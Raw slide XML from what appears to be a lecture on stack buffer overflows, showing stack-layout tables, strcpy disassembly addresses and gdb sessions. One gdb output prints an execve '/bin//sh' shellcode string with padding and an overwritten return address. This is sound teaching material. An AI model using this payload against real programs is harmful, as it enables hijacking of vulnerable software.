                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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224</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394261426"/>
              </p:ext>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048415</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747670" y="305359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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224759" y="4641448"/>
            <a:ext cx="4838218" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/s 0xbffff861</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff861:	"1\300Phn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//bi\211\343PS\206\345\211\302\v\001̀1\300\260\001\061\333̀", 'a' &lt;repeats 17 times&gt;, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\277\377\366f"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095583465"/>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817393724"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x66f6ffbf</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff861</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="483860791"/>
              </p:ext>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804841a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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4764988" y="333495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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2279172"/>
            <a:ext cx="2831284" cy="457048"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765142"/>
            <a:ext cx="2831284" cy="51403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 * 17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55190996"/>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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
